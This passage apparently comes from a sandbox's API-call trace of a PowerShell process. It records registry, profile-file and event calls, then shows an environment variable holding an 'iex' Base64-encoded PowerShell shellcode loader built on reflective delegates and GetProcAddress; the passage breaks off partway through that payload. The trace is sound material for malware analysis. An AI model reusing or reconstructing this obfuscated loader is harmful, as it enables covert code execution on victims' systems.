lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.494] GetLastError () returned 0xcb [0045.494] VirtualQuery (in: lpAddress=0x25cf38, lpBuffer=0x25df38, dwLength=0x1c | out: lpBuffer=0x25df38*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.494] GetLastError () returned 0xcb [0045.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.494] GetLastError () returned 0xcb [0045.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d9bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0045.494] GetLastError () returned 0xcb [0045.494] VirtualQuery (in: lpAddress=0x25cf30, lpBuffer=0x25df30, dwLength=0x1c | out: lpBuffer=0x25df30*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.494] VirtualQuery (in: lpAddress=0x25cbe4, lpBuffer=0x25dbe4, dwLength=0x1c | out: lpBuffer=0x25dbe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.495] VirtualQuery (in: lpAddress=0x25cbe4, lpBuffer=0x25dbe4, dwLength=0x1c | out: lpBuffer=0x25dbe4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.496] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e66c | out: phkResult=0x25e66c*=0x3d4) returned 0x0 [0045.496] RegQueryValueExW (in: hKey=0x3d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e6b4, lpData=0x0, lpcbData=0x25e6b0*=0x0 | out: lpType=0x25e6b4*=0x1, lpData=0x0, lpcbData=0x25e6b0*=0x56) returned 0x0 [0045.496] RegQueryValueExW (in: hKey=0x3d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e6b4, lpData=0x54e2a0, lpcbData=0x25e6b0*=0x56 | out: lpType=0x25e6b4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e6b0*=0x56) returned 0x0 [0045.497] RegCloseKey (hKey=0x3d4) returned 0x0 [0045.497] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e66c | out: phkResult=0x25e66c*=0x3d4) returned 0x0 [0045.497] RegQueryValueExW (in: hKey=0x3d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e6b4, lpData=0x0, lpcbData=0x25e6b0*=0x0 | out: lpType=0x25e6b4*=0x1, lpData=0x0, lpcbData=0x25e6b0*=0x56) returned 0x0 [0045.497] RegQueryValueExW (in: hKey=0x3d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e6b4, lpData=0x54e2a0, lpcbData=0x25e6b0*=0x56 | out: lpType=0x25e6b4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e6b0*=0x56) returned 0x0 [0045.497] RegCloseKey (hKey=0x3d4) returned 0x0 [0045.498] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x54e2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0045.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0045.498] GetLastError () returned 0x3f0 [0045.498] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x54e2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0045.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x25e204, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0045.498] GetLastError () returned 0x3f0 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x25e29c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0045.499] GetLastError () returned 0x3f0 [0045.499] SetErrorMode (uMode=0x1) returned 0x1 [0045.499] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e71c | out: lpFileInformation=0x25e71c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.499] GetLastError () returned 0x2 [0045.499] SetErrorMode (uMode=0x1) returned 0x1 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x25e29c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0045.499] GetLastError () returned 0x2 [0045.499] SetErrorMode (uMode=0x1) returned 0x1 [0045.499] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e71c | out: lpFileInformation=0x25e71c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.499] GetLastError () returned 0x2 [0045.499] SetErrorMode (uMode=0x1) returned 0x1 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x25e29c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45 [0045.499] GetLastError () returned 0x2 [0045.499] SetErrorMode (uMode=0x1) returned 0x1 [0045.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e71c | out: lpFileInformation=0x25e71c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.499] GetLastError () returned 0x3 [0045.499] SetErrorMode (uMode=0x1) returned 0x1 [0045.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x25e29c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a [0045.500] GetLastError () returned 0x3 [0045.500] SetErrorMode (uMode=0x1) returned 0x1 [0045.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x25e71c | out: lpFileInformation=0x25e71c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.500] GetLastError () returned 0x3 [0045.500] SetErrorMode (uMode=0x1) returned 0x1 [0045.500] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.500] GetLastError () returned 0xcb [0045.501] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.501] GetLastError () returned 0xcb [0045.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.503] GetLastError () returned 0xcb [0045.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.504] GetLastError () returned 0xcb [0045.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.504] GetLastError () returned 0xcb [0045.506] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.506] GetLastError () returned 0xcb [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d4 [0045.506] GetLastError () returned 0x0 [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d8 [0045.506] GetLastError () returned 0x0 [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0045.506] GetLastError () returned 0x0 [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0045.506] GetLastError () returned 0x0 [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4 [0045.506] GetLastError () returned 0x0 [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3e8 [0045.506] GetLastError () returned 0x0 [0045.506] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ec [0045.506] GetLastError () returned 0x0 [0045.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0045.507] GetLastError () returned 0x0 [0045.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0045.507] GetLastError () returned 0x0 [0045.507] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3f8 [0045.507] GetLastError () returned 0x0 [0045.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3fc [0045.507] GetLastError () returned 0x0 [0045.507] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x404 [0045.507] GetLastError () returned 0x0 [0045.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.507] GetLastError () returned 0xcb [0045.508] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0045.508] GetLastError () returned 0xcb [0045.509] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x25e75c | out: lpMode=0x25e75c) returned 1 [0045.509] GetLastError () returned 0xcb [0045.510] SetEvent (hEvent=0x3e0) returned 1 [0045.510] GetLastError () returned 0xcb [0045.510] SetEvent (hEvent=0x3d4) returned 1 [0045.510] GetLastError () returned 0xcb [0045.510] SetEvent (hEvent=0x3d8) returned 1 [0045.510] GetLastError () returned 0xcb [0045.510] SetEvent (hEvent=0x3dc) returned 1 [0045.510] GetLastError () returned 0xcb [0045.510] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x408 [0045.510] GetLastError () returned 0x0 [0045.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.510] GetLastError () returned 0xcb [0045.510] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e5c0 | out: phkResult=0x25e5c0*=0x40c) returned 0x0 [0045.510] RegQueryValueExW (in: hKey=0x40c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x25e608, lpData=0x0, lpcbData=0x25e604*=0x0 | out: lpType=0x25e608*=0x0, lpData=0x0, lpcbData=0x25e604*=0x0) returned 0x2 Thread: id = 11 os_tid = 0xa74 Thread: id = 12 os_tid = 0xa78 Thread: id = 13 os_tid = 0xa7c Thread: id = 14 os_tid = 0xa80 Thread: id = 15 os_tid = 0xa84 [0040.319] CoGetContextToken (in: pToken=0x4d7f478 | out: pToken=0x4d7f478) returned 0x0 [0040.319] CObjectContext::QueryInterface () returned 0x0 [0040.319] CObjectContext::GetCurrentThreadType () returned 0x0 [0040.319] Release () returned 0x0 [0040.319] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0043.537] LocalFree (hMem=0x5dde18) returned 0x0 [0043.537] GetLastError () returned 0x0 [0043.538] CloseHandle (hObject=0x338) returned 1 [0043.538] GetLastError () returned 0x0 [0043.538] CloseHandle (hObject=0x13) returned 1 [0043.538] GetLastError () returned 0x0 [0043.538] CloseHandle (hObject=0xf) returned 1 [0043.538] GetLastError () returned 0x0 [0043.538] RegCloseKey (hKey=0x31c) returned 0x0 [0043.538] RegCloseKey (hKey=0x318) returned 0x0 [0043.538] RegCloseKey (hKey=0x314) returned 0x0 [0043.539] LocalFree (hMem=0x5dde38) returned 0x0 [0043.539] GetLastError () returned 0x0 [0043.539] RegCloseKey (hKey=0x344) returned 0x0 [0044.596] RegCloseKey (hKey=0x344) returned 0x0 [0045.759] RegCloseKey (hKey=0x3c0) returned 0x0 [0045.759] RegCloseKey (hKey=0x3a0) returned 0x0 [0045.759] RegCloseKey (hKey=0x39c) returned 0x0 [0045.760] RegCloseKey (hKey=0x398) returned 0x0 [0045.760] RegCloseKey (hKey=0x394) returned 0x0 [0045.760] RegCloseKey (hKey=0x390) returned 0x0 [0045.760] RegCloseKey (hKey=0x38c) returned 0x0 [0045.760] RegCloseKey (hKey=0x388) returned 0x0 [0045.760] RegCloseKey (hKey=0x318) returned 0x0 [0045.760] RegCloseKey (hKey=0x3bc) returned 0x0 [0045.760] RegCloseKey (hKey=0x380) returned 0x0 [0045.761] RegCloseKey (hKey=0x37c) returned 0x0 [0045.761] RegCloseKey (hKey=0x378) returned 0x0 [0045.761] RegCloseKey (hKey=0x374) returned 0x0 [0045.761] RegCloseKey (hKey=0x370) returned 0x0 [0045.761] RegCloseKey (hKey=0x36c) returned 0x0 [0045.761] RegCloseKey (hKey=0x368) returned 0x0 [0045.761] RegCloseKey (hKey=0x364) returned 0x0 [0045.762] RegCloseKey (hKey=0x3b8) returned 0x0 [0045.762] RegCloseKey (hKey=0x3b4) returned 0x0 [0045.762] RegCloseKey (hKey=0x35c) returned 0x0 [0045.762] RegCloseKey (hKey=0x358) returned 0x0 [0045.762] RegCloseKey (hKey=0x354) returned 0x0 [0045.762] RegCloseKey (hKey=0x350) returned 0x0 [0045.762] RegCloseKey (hKey=0x34c) returned 0x0 [0045.762] RegCloseKey (hKey=0x348) returned 0x0 [0045.763] RegCloseKey (hKey=0x338) returned 0x0 [0045.763] RegCloseKey (hKey=0x31c) returned 0x0 [0045.763] RegCloseKey (hKey=0x314) returned 0x0 [0045.763] RegCloseKey (hKey=0x344) returned 0x0 [0045.763] RegCloseKey (hKey=0x3b0) returned 0x0 [0045.763] RegCloseKey (hKey=0x3ac) returned 0x0 [0045.763] RegCloseKey (hKey=0x3a8) returned 0x0 [0045.763] RegCloseKey (hKey=0x384) returned 0x0 [0045.763] RegCloseKey (hKey=0x40c) returned 0x0 Thread: id = 16 os_tid = 0x0 Thread: id = 17 os_tid = 0xa88 [0045.513] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0045.541] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.547] VirtualQuery (in: lpAddress=0x602e4c0, lpBuffer=0x602f4c0, dwLength=0x1c | out: lpBuffer=0x602f4c0*(BaseAddress=0x602e000, AllocationBase=0x56a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.550] GetLastError () returned 0xcb [0045.552] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.552] GetLastError () returned 0xcb [0045.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.553] GetLastError () returned 0xcb [0045.563] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.563] GetLastError () returned 0xcb [0045.564] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.564] GetLastError () returned 0xcb [0045.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.565] GetLastError () returned 0xcb [0045.576] VirtualQuery (in: lpAddress=0x602e5dc, lpBuffer=0x602f5dc, dwLength=0x1c | out: lpBuffer=0x602f5dc*(BaseAddress=0x602e000, AllocationBase=0x56a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0045.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.577] GetLastError () returned 0xcb [0045.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.578] GetLastError () returned 0xcb [0045.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.578] GetLastError () returned 0xcb [0045.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.589] GetLastError () returned 0xcb [0045.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.601] GetLastError () returned 0xcb [0045.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.657] GetLastError () returned 0xcb [0045.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.658] GetLastError () returned 0xcb [0045.658] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.658] GetLastError () returned 0xcb [0045.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.659] GetLastError () returned 0xcb [0045.660] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.660] GetLastError () returned 0xcb [0045.661] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.661] GetLastError () returned 0xcb [0045.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.662] GetLastError () returned 0xcb [0045.676] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba8a8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.676] GetLastError () returned 0xcb [0045.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.731] GetLastError () returned 0xcb [0045.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x0 [0045.740] GetLastError () returned 0xcb [0045.742] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x5ba900, nSize=0x80 | out: lpBuffer="") returned 0x7308 [0045.742] GetLastError () returned 0xcb [0045.764] GetEnvironmentVariableW (in: lpName="a", lpBuffer=0x631728, nSize=0x7308 | out: lpBuffer="iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJ